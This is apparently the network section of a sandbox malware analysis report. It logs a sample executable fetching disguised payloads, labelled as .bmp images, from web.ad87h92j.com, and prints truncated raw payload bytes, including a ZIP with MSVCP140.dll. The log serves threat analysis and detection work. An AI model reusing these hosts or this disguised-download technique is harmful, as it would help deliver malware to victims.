                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Aug 27, 2024 09:49:33.929445028 CEST1.1.1.1192.168.2.80xa9baNo error (0)web.ad87h92j.com188.114.96.3A (IP address)IN (0x0001)false
                                Aug 27, 2024 09:49:33.929445028 CEST1.1.1.1192.168.2.80xa9baNo error (0)web.ad87h92j.com188.114.97.3A (IP address)IN (0x0001)false
                                Aug 27, 2024 09:50:01.359682083 CEST1.1.1.1192.168.2.80x2d66No error (0)cacer.goldenh0ur.com104.21.17.45A (IP address)IN (0x0001)false
                                Aug 27, 2024 09:50:01.359682083 CEST1.1.1.1192.168.2.80x2d66No error (0)cacer.goldenh0ur.com172.67.222.6A (IP address)IN (0x0001)false
                                Aug 27, 2024 09:50:03.011744022 CEST1.1.1.1192.168.2.80xb2f8No error (0)mvc.withoutyou5.com104.26.7.127A (IP address)IN (0x0001)false
                                Aug 27, 2024 09:50:03.011744022 CEST1.1.1.1192.168.2.80xb2f8No error (0)mvc.withoutyou5.com104.26.6.127A (IP address)IN (0x0001)false
                                Aug 27, 2024 09:50:03.011744022 CEST1.1.1.1192.168.2.80xb2f8No error (0)mvc.withoutyou5.com172.67.72.137A (IP address)IN (0x0001)false
                                • cacer.goldenh0ur.com
                                • mvc.withoutyou5.com
                                • web.ad87h92j.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.849714188.114.96.3807440C:\Users\user\Desktop\pXm5oVO3Go.exe
                                TimestampBytes transferredDirectionData
                                Aug 27, 2024 09:49:33.939544916 CEST77OUTGET /4/long.bmp HTTP/1.1
                                Host: web.ad87h92j.com
                                Cache-Control: no-cache
                                Aug 27, 2024 09:49:34.405163050 CEST1236INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:49:34 GMT
                                Content-Type: image/bmp
                                Content-Length: 139784
                                Connection: keep-alive
                                Last-Modified: Fri, 09 Aug 2024 04:56:47 GMT
                                ETag: "b09db28918eada1:0"
                                Cache-Control: max-age=14400
                                CF-Cache-Status: HIT
                                Age: 43
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RPkOikkXg7j7G3bcyuG2UeUV%2FjrwUinI9VJYflbCw%2B8ZwhztitUqV9IR6452hzFng5b9qdu9qOS8Hk7XHYdE4vcUj0PiIj23dE2T1Fd1vC7h94JLQ4DZRYFqOb5jZJJGduk"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a7739aacb4344-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 84 6c 00 00 6c 34 55 89 89 e5 c2 05 93 67 00 00 ed ae ff 21 6e 6c 68 05 6c 6c 00 68 68 6c 00 00 3e 04 c0 1b c4 99 50 e8 69 6c 00 00 ef a8 14 c9 af ed ec 14 6d 6c 00 53 39 3a 57 6a 07 34 6a 65 0a e5 84 24 a0 6c 00 00 5f 81 58 6a 1e 35 6a 6e 37 06 6c 5a 06 5f 66 89 e8 48 ce 00 6c 6c 66 89 e8 48 d4 00 6c 6c 58 6a 5e 0a 89 84 48 b4 00 00 6c 34 6a 2e 0a e5 84 24 b6 6c 00 00 34 06 64 66 e5 e8 24 dc 6c 6c 00 58 e5 c0 24 b0 6c 6c 00 89 00 48 34 89 c0 48 b8 00 6c 6c 89 ac 48 a8 00 00 6c e5 ac 24 d8 6c 00 00 e5 c0 24 ac 6c 6c 00 89 c0 48 e0 00 6c 6c 66 89 e0 48 cc 00 6c 6c 66 89 f0 48 ce 00 6c 6c 66 89 f8 48 d2 00 6c 6c 66 89 e8 48 da 00 6c 6c 66 89 f8 48 dc 00 6c 6c 66 89 f8 48 de 00 6c 6c c6 44 48 50 53 88 38 48 3d 66 ab 28 24 3e 09 09 c6 44 48 2c 70 66 ab 28 24 50 20 03 c6 44 48 3e 61 88 28 48 53 66 ab 28 24 54 20 05 c6 44 48 3a 62 88 20 48 57 c6 28 48 58 61 e4 20 24 59 0a ab 44 24 36 15 41 66 ab 28 24 44 3a 05 88 4c 48 2a 66 c7 28 48 47 74 19 aa 44 24 25 0d 88 54 48 26 c6 44 48 27 41 88 38 48 4c 88 38 48 [TRUNCATED]
                                Data Ascii: ll4Ug!nlhllhhl>PilmlS9:Wj4je$l_Xj5jn7lZ_fHllfHllXj^Hl4j.$l4df$llX$llH4HllHl$l$llHllfHllfHllfHllfHllfHllfHllDHPS8H=f($>DH,pf($P DH>a(HSf($T DH:b HW(HXa $YD$6Af($D:LH*f(HGtD$%TH&DH'A8HL8HMf($Nf(H\VL$2DH3tu($aT$D$<LHDHotDHtHllFHllHlsh%$l$lHl$lti$lloYHllLHLHLHHlHl$l/ch($l+D$NaDHiv($u?stD$
                                Aug 27, 2024 09:49:34.405210018 CEST224INData Raw: 49 88 30 48 7c 66 ab 28 24 7d 0a 03 66 c7 e8 48 80 00 6c 6c 52 74 e4 f8 24 82 6c 6c 00 c6 e8 48 83 00 6c 6c 41 88 e8 48 84 00 6c 6c 88 84 48 e9 00 00 6c 0a c7 84 48 ea 00 00 6c 2a 75 88 f0 48 88 00 6c 6c c7 84 48 e5 00 00 6c 0f 74 69 03 e4 9c 24
                                Data Ascii: I0H|f($}fHllRt$llHllAHllHlHl*uHllHlti$l$l8HlHlwll-^kll$lljt$l4HlHlD$p<Hl\$X<UUj3D$(|HxDHtDHXPU($|$r<tHDb
                                Aug 27, 2024 09:49:34.405221939 CEST1236INData Raw: 58 66 e5 28 24 14 0a e5 44 24 7a e1 44 24 30 e5 44 24 74 e1 84 24 d8 6c 00 00 3c 39 8d 44 48 70 50 ff 18 48 28 ff bf 06 15 58 0a e5 44 24 78 0a 89 44 48 7a 8d 84 48 f8 00 00 6c e5 44 24 74 e1 84 24 d4 6c 00 00 3c 39 8d 44 48 70 50 ff 18 48 28 ff
                                Data Ascii: Xf($D$zD$0D$t$l<9DHpPH(XD$xDHzHlD$t$l<9DHpPH(^($lt$xD$t$l<9DHpfHP$(j4DHxf(H(H<(HHllPU($<t$DHllfH(HHllPU($t$r<tHD($P|$xD$t$l<9DHpfHP$(
                                Aug 27, 2024 09:49:34.405236959 CEST1236INData Raw: f9 8b e0 48 c0 00 6c 6c 55 66 e5 28 24 18 0a e5 44 24 76 e1 44 24 74 06 00 89 20 48 20 50 3e 93 d7 83 aa 68 83 c5 68 e7 0e 85 a5 18 06 8b 38 48 1c eb c4 e7 7c 24 40 ef 7c 24 54 6c 74 1c 5f ac 40 39 28 48 10 76 7f 05 84 24 54 6d 00 00 84 6f 00 00
                                Data Ascii: HllUf($D$vD$t H P>hh8H|$@|$Tlt_@9(Hv$Tmo<$l+ x|H@cLlHDllcllloDH|l$oPHll $`o>l[H0{ye:<j\n_T$TTtg,BVlu8$8:DHtf(H(
                                Aug 27, 2024 09:49:34.405261040 CEST1236INData Raw: 50 56 50 f1 fb 56 77 89 78 56 7a f1 fb 56 77 89 68 56 6d f1 fb 56 7e f1 fa 56 e0 f1 fb 56 11 87 54 56 7a f1 fb 56 11 87 60 56 7f f1 fb 56 11 87 66 56 7f f1 fb 56 3e 05 63 68 7e f1 fb 56 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 3c 29 00 00
                                Data Ascii: PVPVwxVzVwhVmV~VVTVzV`VVfVV>ch~Vllllllll<) mflllll!gmllllhl|llll|lnilllilllllhllnl@lll|lll|ll|l\wxLllllllllllllll,|
                                Aug 27, 2024 09:49:34.405273914 CEST1236INData Raw: a5 01 7c d2 00 00 6c ec 56 ff bb e9 c0 74 7e 04 cc a5 6d 7c e8 4d ca 6c 00 59 5f ac e9 c4 68 6c 00 6a 66 04 d4 a5 6d 7c 6a 01 3f 3f ff b5 b0 9f ff ff 93 79 18 80 6d 7c 85 c0 18 7f ff b5 b0 9f ff ff 93 79 20 80 6d 7c 68 d8 c9 6d 10 eb a9 3f 8d 85
                                Data Ascii: |lVt~m|MlY_hljfm|j??ym|y m|hm?<?hlnS??hmVkhmll/?<=;Q\Shh)x\Co`tMen$xdler0p\00 21X\H]A00(
                                Aug 27, 2024 09:49:34.405286074 CEST1236INData Raw: 50 8d e9 94 f9 ff 93 3c ff 15 d0 ec 01 10 5f ac 40 8b 21 90 5f 5e 5f a1 5b e8 bd fa 00 00 a5 af 6a 04 d4 15 72 01 7c 84 b9 2b 6d 6c 6a 0c 84 ef a6 00 6c e7 f0 59 e5 19 f0 83 09 90 00 85 9a 18 17 ff 19 64 83 66 68 6c c7 46 64 6d 00 00 6c 84 0a 94
                                Data Ascii: P<_@!_^_[jr|+mljlYdfhlFdmllln3![fhlk@mhljr|a+mljGlY)dfhlFdmlmju}UE`hlkp_M7tGmhlV[t[F<m&"j
                                Aug 27, 2024 09:49:34.405297995 CEST552INData Raw: 0c 8d 29 a8 50 8b a3 84 6e fd 93 93 59 8b 11 a0 8d 45 a8 3c 68 74 cb 6d 10 53 93 ba 85 c0 18 60 8d 45 a8 3c 8b cf 84 23 fd ff 93 35 33 c0 e1 11 f1 ab c7 0a ab aa 5f ac 8d 7d c0 c7 ab 8d 29 9c 50 66 ab 29 f0 01 6d aa 45 f7 7c e5 5d f8 ab 29 b0 20
                                Data Ascii: )PnYE<htmS`E<#53_})Pf)mE|]) ll)hP)Puum=8u)ll@mh-5;cllPSllm)clnl)Phmyp|ubuyTm|Hnl)PW?)S)E?j
                                Aug 27, 2024 09:49:34.405312061 CEST1236INData Raw: 8b cf 84 27 fb ff 93 35 8b 7d a0 e1 45 f4 3c 04 08 a7 6d 7c 53 ff ba e9 c0 74 60 e1 45 f4 3c e7 cf e8 40 97 ff ff 35 e7 7d cc e1 29 f4 50 04 48 a7 01 7c 3f ff d6 e9 ac 74 0c e1 29 f4 50 e7 a3 e8 0d 97 93 ff 59 e7 11 cc 8d 29 98 50 68 2c cb 01 10
                                Data Ascii: '5}E<m|St`E<@5})PH|?t)PY)Ph,?)PYE<h`mS`E<5}E<tm|St`E<5_3}E<f))1) llEmdP)Pjuuym|u=Tm
                                Aug 27, 2024 09:49:34.405318022 CEST1236INData Raw: cf e8 14 9a ff ff 35 e7 7d cc e1 29 f4 50 04 ac a6 01 7c 3f ff d6 e9 ac 74 0c e1 29 f4 50 e7 a3 e8 59 9a 93 ff 59 e7 11 cc 8d 29 98 50 68 b8 ca 01 10 3f 93 d6 85 ac 18 0c 8d 29 98 50 8b a3 84 3a f6 93 93 59 8b 11 a0 8d 45 98 3c 68 e8 ca 6d 10 53
                                Data Ascii: 5})P|?t)PYY)Ph?)P:YE<hmS`E<w5}E<m|St`E<5})PH|?t)PY)Ph,?)PYE<h`mS`E<5}E<tm|St`
                                Aug 27, 2024 09:49:34.410361052 CEST1236INData Raw: 18 8d e9 d0 fc ff 93 3c ff d6 e1 e9 bc fc 93 93 50 8d d1 d4 fc ff 93 84 b8 ef 93 93 c7 45 90 6b 00 00 6c e7 00 3b af 18 04 8b 64 87 02 33 a5 e7 85 8c 90 93 ff 8b 7c 3d 50 ff 3e 40 83 4d 90 93 8d bd d4 90 ff ff 84 85 ef ff 93 06 08 5f e7 ab 68 fc
                                Data Ascii: <PEkl;d3|=P>@M_hm)WiEw (Een)d )Uqf)ta1f<D;fhlkPT<h<y|Ef)<


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.849715188.114.96.3807440C:\Users\user\Desktop\pXm5oVO3Go.exe
                                TimestampBytes transferredDirectionData
                                Aug 27, 2024 09:49:34.861166000 CEST120OUTHEAD /4/text.bmp HTTP/1.1
                                Cache-Control: no-cache
                                Connection: Keep-Alive
                                Pragma: no-cache
                                Host: web.ad87h92j.com
                                Aug 27, 2024 09:49:35.350728035 CEST692INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:49:35 GMT
                                Content-Type: image/bmp
                                Content-Length: 6443425
                                Connection: keep-alive
                                Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                                ETag: "607df428a8e9da1:0"
                                Cache-Control: max-age=14400
                                CF-Cache-Status: HIT
                                Age: 431
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRIMRIqkE5Xn9WQieatfccB2KohdmDOBT6Y2phH%2F8K1%2FhPv3rxZTqZUozVeIE0AR7RibYQdqQThoTqU6NpCOqou9IFS4LYV5i9W4AGpPeYtAf%2FkC0xJ%2BZrOmM0lIHUYzYHrZ"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a773f5a6442e8-EWR
                                alt-svc: h3=":443"; ma=86400
                                Aug 27, 2024 09:49:35.353763103 CEST119OUTGET /4/text.bmp HTTP/1.1
                                Cache-Control: no-cache
                                Connection: Keep-Alive
                                Pragma: no-cache
                                Host: web.ad87h92j.com
                                Aug 27, 2024 09:49:35.455451965 CEST1236INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:49:35 GMT
                                Content-Type: image/bmp
                                Content-Length: 6443425
                                Connection: keep-alive
                                Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                                ETag: "607df428a8e9da1:0"
                                Cache-Control: max-age=14400
                                CF-Cache-Status: HIT
                                Age: 431
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ag4unlxgbi4UOJjInOq9jj0IknIEUW%2BWZAEJfwZ4z8eF5GkjiYppNG8O8BcnUQCzgkFdFjlKIMYBHDMnWWOunyST57yvGfdOTtozTl92UzkA7TLPNFZvD2bnMsKALH4nprDk"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a77404ae242e8-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c [TRUNCATED]
                                Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G,f
                                Aug 27, 2024 09:49:35.455481052 CEST1236INData Raw: e6 52 4a 96 de f4 55 2f 87 04 f5 77 df 64 b2 b2 cf 7f db 8e e0 a3 c6 bc f2 d8 76 d0 2d a3 8a 92 84 92 1d 04 c3 21 d5 41 3d 5c 5c 55 6e db e0 06 fc 85 66 0c f1 90 1a 88 35 63 60 37 93 5b 01 d5 74 bb 3a a9 99 4a 31 1f 93 12 2f 48 56 f1 b2 b3 25 aa
                                Data Ascii: RJU/wdv-!A=\\Unf5c`7[t:J1/HV%6IIBej">($|:Wb.wAx*BMX}bpk055^%wC ua}*:?u!j[0;!BidiF2T2mgC}R.2J7
                                Aug 27, 2024 09:49:35.455497980 CEST1236INData Raw: 3c a5 4a 7f 2f 8e 72 df 6e ac 75 3e 67 55 0e a7 3b f5 2f 91 20 bb f7 4b d4 ca dd ce 1f 20 92 23 b8 3c f4 25 31 11 a8 5d ab ac 68 ea 27 da 48 b8 6c 98 73 b8 95 b5 85 26 bf d9 58 2a c2 66 8c 74 56 0a 6b 37 95 54 eb 8c 0f 4f 2b 78 c4 38 0a fe 9f 3c
                                Data Ascii: <J/rnu>gU;/ K #<%1]h'Hls&X*ftVk7TO+x8<nt_/!bBI)1d+s:jYE%kS^4v]\`;^t3msXW[U>^O)jA5/MMg~L+iv 'MP!H(F
                                Aug 27, 2024 09:49:35.455511093 CEST1236INData Raw: 65 83 66 eb 78 14 b0 3c 8e 7c d7 9a 29 6c 14 a9 7a d8 e5 fd d3 34 1c 17 a8 c7 07 e7 45 af 95 47 bc 69 48 a9 a9 d0 be de b2 e1 95 af 2c 1a a5 20 b5 67 27 a5 e9 28 10 a8 5e 1b da 47 92 6e 8c c9 f8 70 86 57 63 7b a3 be 01 e5 bb 6c 47 3c 31 92 ee 71
                                Data Ascii: efx<|)lz4EGiH, g'(^GnpWc{lG<1q;9*IOH>9l_41"5_1A}u5v\s~qN4{+uZN2vuRsK}>cMuWo8?v`O,3$T2|yg$&'
                                Aug 27, 2024 09:49:35.455523968 CEST896INData Raw: 8f 6b 18 23 7b 7b c7 01 8c b5 fd c5 b2 f3 ba b7 02 e3 3f 76 ec 02 54 1f 66 ca 6c 0b 7c 91 46 07 43 fe 5e c2 f0 cb a7 11 c9 de 27 19 e8 99 ba 1a 57 0a c5 56 47 e1 f9 8c 87 24 77 ed 3e a1 b6 fa a3 31 59 e0 dc d7 31 00 18 32 86 90 ea 94 6b cb 89 25
                                Data Ascii: k#{{?vTfl|FC^'WVG$w>1Y12k%^VZAPwcA6!k)5%ZRKK2%M,9!-d{Tk5^aC$J1="%&T=k/RT^"k-E:b5GwEk4*Juv8
                                Aug 27, 2024 09:49:35.455538034 CEST1236INData Raw: 89 0b 4c 01 7d 14 ab b4 0b c2 8b 8e 62 8e 71 e9 30 fc f4 72 05 b4 62 f0 15 14 00 68 38 38 ef 36 16 a8 17 51 26 8a 9e 71 33 a1 ff 2e de e0 36 f3 bc e1 40 ab d5 25 1f 17 dd 6d ab 44 f0 81 62 87 93 14 b8 af bf 23 53 ed 4a d2 b3 79 51 45 26 ea f3 7f
                                Data Ascii: L}bq0rbh886Q&q3.6@%mDb#SJyQE&K*eGV&EM%np}~P{1`5%Cf;"eY^mZp#`KG+c#]h]Ti=]>l!?,vE-fp
                                Aug 27, 2024 09:49:35.455569983 CEST1236INData Raw: 09 9b e8 0d 1c 36 b0 b3 bf 86 a8 8f 53 12 d1 89 5f 8b a5 c9 93 43 94 84 71 50 60 c4 e8 0e ae f3 aa fa cd 8a 8a 09 5b f4 9b 7a 92 8c d3 2d 9b a1 10 6d 78 53 5e 3b 1e a6 0e 62 52 70 02 1d 6a 7e 9c 2b 4d 9d ee 50 80 65 5c 34 5e ee 0a 3b 08 0e f2 af
                                Data Ascii: 6S_CqP`[z-mxS^;bRpj~+MPe\4^;a1nC_!p]BJ"*I0$^#iszT?E 0$'#}vwD9AEQ;R"?UwoX*9f5 X v`@0-u-mD
                                Aug 27, 2024 09:49:35.455580950 CEST1236INData Raw: 53 b2 b2 f1 6b 5b 49 9d 33 66 5b e4 db 1d 4d 5b 4b 6a 97 83 54 f3 2f 63 9e c4 b2 b1 b5 08 9d 06 8b 1b 20 66 90 2a c4 28 74 d9 4a de 7e b1 d2 6d 08 95 75 69 9d 73 79 1d 9b db c0 4c f3 1b 76 a0 68 81 f7 11 ff fe b2 86 d5 47 30 33 8f 4c 77 e8 0d e8
                                Data Ascii: Sk[I3f[M[KjT/c f*(tJ~muisyLvhG03Lw9XmcYOE5M +/+62gb}bs6OykwboP'&xcWKLY1?@$bdJMRzG=w8ahL'I[y%H
                                Aug 27, 2024 09:49:35.455593109 CEST1236INData Raw: 8e 42 8e f0 5f 07 45 60 ca d1 a0 0e 8c fa 49 bd 82 d9 af f9 a1 2f e7 9b 2a 68 d2 93 c5 77 f5 c1 4a a3 50 bb ef b6 05 9b f3 78 bd b1 dc c7 77 e7 e5 fd 7c 33 30 1e 05 97 c2 49 a7 b5 27 82 43 3f f1 6f 4b fc 68 da f0 a4 5a 15 12 ba 37 31 a4 a7 b6 e2
                                Data Ascii: B_E`I/*hwJPxw|30I'C?oKhZ71Ac>6u;sow )JCUS!Yi]u,09S)_r=n$fL45v}%dmNCeS6:(=%$R3f^8\`x!(y"@IeB,DnBQ?Du
                                Aug 27, 2024 09:49:35.455610991 CEST1236INData Raw: 7a f3 a6 ae ba 2e 23 5a 06 93 7a 4d 24 ba 0e 89 1d 63 0b 1f 5a 66 31 ab 18 33 1c 2d 85 76 e8 4a 65 be 53 29 34 7d 88 19 2a 0c a9 53 b4 cc 4a 28 f5 ca 3f 26 58 c9 be c8 61 6c 4e 3a 5e 07 8c 7b 1f ed 43 b3 8f 9e fd 6c 03 19 b1 de d6 a9 94 b2 2e db
                                Data Ascii: z.#ZzM$cZf13-vJeS)4}*SJ(?&XalN:^{Cl.#gPUVot,!f_|v'N]-`4XJwxTkj&'Qm^q)Avo9;Zpo7&i^hFDc[]q?uH
                                Aug 27, 2024 09:49:35.456203938 CEST1236INData Raw: 3c 47 f8 b6 bc 50 21 ae a7 6b 1d b7 67 b8 33 9b bb 67 c8 ba 41 f6 17 d1 e3 6f da 77 6e 38 e7 e8 05 2f 91 a2 d7 50 76 3e 87 7a 06 6f ee c2 6f 2a 92 4e d5 a5 75 83 b3 cf 81 d0 9f 9c 89 6a 1d ab ce f5 43 e0 6d 73 7c f6 00 bb 82 4e b8 3b 87 5a 11 29
                                Data Ascii: <GP!kg3gAown8/Pv>zoo*NujCms|N;Z)}i$BvJIxObdAjoo 14:_#g:U><cHs8Fvl<x>hzdgy"oPVc.|HH;4Uv#/;xik'Y
                                Aug 27, 2024 09:49:41.133941889 CEST117OUTHEAD /4/d.bmp HTTP/1.1
                                Cache-Control: no-cache
                                Connection: Keep-Alive
                                Pragma: no-cache
                                Host: web.ad87h92j.com
                                Aug 27, 2024 09:49:41.236068010 CEST694INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:49:41 GMT
                                Content-Type: image/bmp
                                Content-Length: 1236598
                                Connection: keep-alive
                                Last-Modified: Sat, 10 Aug 2024 07:20:10 GMT
                                ETag: "80fe2fbcf5eada1:0"
                                Cache-Control: max-age=14400
                                CF-Cache-Status: HIT
                                Age: 430
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2BIQBT9fKIYyJz%2FeOOZH2Qz%2ByksyDoJydvEW9axvV1wUIdbn98xUNWCFnT8yrmHBtBBpCoG3euMJoGzcOBIS09BfVxLMzh16QrmRLYNj%2BGalWKXxGWdLs7bk%2BvJBs5ma8HLV"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a77646da242e8-EWR
                                alt-svc: h3=":443"; ma=86400
                                Aug 27, 2024 09:49:41.236726046 CEST116OUTGET /4/d.bmp HTTP/1.1
                                Cache-Control: no-cache
                                Connection: Keep-Alive
                                Pragma: no-cache
                                Host: web.ad87h92j.com
                                Aug 27, 2024 09:49:41.338432074 CEST1236INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:49:41 GMT
                                Content-Type: image/bmp
                                Content-Length: 1236598
                                Connection: keep-alive
                                Last-Modified: Sat, 10 Aug 2024 07:20:10 GMT
                                ETag: "80fe2fbcf5eada1:0"
                                Cache-Control: max-age=14400
                                CF-Cache-Status: HIT
                                Age: 430
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iedFG6t81OaKJq4mPYe2JVe%2BdZlPEpzyVnhd3QjGcRpYfQKU8WFdYTLOqUSTwVJNmLC76HE%2F2qe6%2Bvsh4%2FxhaNdrBuchWJeiv3c7EgvnFCGLKdB7YVnQaD2BQ28aVRpWAbnP"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a77650e0542e8-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 42 4d 76 de 12 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 02 00 00 2c 02 00 00 01 00 20 00 00 00 00 00 40 de 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 52 90 00 64 08 00 00 63 08 00 00 98 f7 00 00 df 08 00 00 67 08 00 00 27 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 97 08 00 00 69 17 ba 0e 67 bc 09 cd 46 b0 01 4c aa 29 54 68 0e 7b 20 70 15 67 67 72 06 65 20 63 06 66 6e 6f 13 28 62 65 47 7a 75 6e 47 61 6e 20 23 47 53 20 0a 67 64 65 49 05 0d 0a 43 08 00 00 67 08 00 00 9a 88 c4 41 de e9 aa 12 de e9 aa 12 de e9 aa 12 b1 9f 34 12 ea e9 aa 12 b1 9f 00 12 46 e9 aa 12 b1 9f 01 12 f1 e9 aa 12 d7 91 29 12 dd e9 aa 12 d7 91 39 12 cf e9 aa 12 de e9 ab 12 04 e9 aa 12 b1 9f 05 12 ff e9 aa 12 b1 9f 31 12 df e9 aa 12 b1 9f 30 12 df e9 aa 12 b1 9f 37 12 df e9 aa 12 35 61 63 68 de e9 aa 12 67 08 00 00 67 08 00 00 37 4d 00 00 2b 09 05 00 52 1c b7 66 67 08 00 00 67 08 00 00 87 08 02 21 6c 09 0a 00 67 b6 0a 00 67 38 09 00 67 08 00 00 43 55 08 00 [TRUNCATED]
                                Data Ascii: BMv6(,, @*Rdcg'ggggggggigFL)Th{ pggre cfno(beGzunGan #GS gdeICgA4F)91075achgg7M+Rfgg!lgg8gCUgggggbgbgg8gge@gggggwA>g8?gggggHgggggggg? 'gggggggggI|
                                Aug 27, 2024 09:49:43.243474960 CEST117OUTHEAD /4/t.bmp HTTP/1.1
                                Cache-Control: no-cache
                                Connection: Keep-Alive
                                Pragma: no-cache
                                Host: web.ad87h92j.com
                                Aug 27, 2024 09:49:43.345062971 CEST691INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:49:43 GMT
                                Content-Type: image/bmp
                                Content-Length: 569918
                                Connection: keep-alive
                                Last-Modified: Thu, 08 Aug 2024 15:32:42 GMT
                                ETag: "20368335a8e9da1:0"
                                Cache-Control: max-age=14400
                                CF-Cache-Status: HIT
                                Age: 430
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIJL2xfuzkFVuOSs97cnHHt2Pz5EN%2FnIN63gWbUWrsFFb8vAbc8LcR2ErRNU1WaIMyyS0aUyfzgR6xcDuPVnkBC9sD8hXQvRD9OroxogcO4Dcwplpmf%2BmRbf%2F%2FA04mvNCi9N"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a77719bf842e8-EWR
                                alt-svc: h3=":443"; ma=86400
                                Aug 27, 2024 09:49:43.345628977 CEST116OUTGET /4/t.bmp HTTP/1.1
                                Cache-Control: no-cache
                                Connection: Keep-Alive
                                Pragma: no-cache
                                Host: web.ad87h92j.com
                                Aug 27, 2024 09:49:43.446289062 CEST1236INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:49:43 GMT
                                Content-Type: image/bmp
                                Content-Length: 569918
                                Connection: keep-alive
                                Last-Modified: Thu, 08 Aug 2024 15:32:42 GMT
                                ETag: "20368335a8e9da1:0"
                                Cache-Control: max-age=14400
                                CF-Cache-Status: HIT
                                Age: 430
                                Accept-Ranges: bytes
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B1RGDRfFX8oFlDUK6MEjiytxfnxHsZ2mK%2B4Nijo%2B4uBawbbmSBMFgtf0fxtdTqW%2BPwLdEZ5TuxAkKXKak3YJjoqrxxh3oNSyrGrybFZfhJhNXy71nMcaCL4K%2FChFojaKrCYP"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a77723c3242e8-EWR
                                alt-svc: h3=":443"; ma=86400
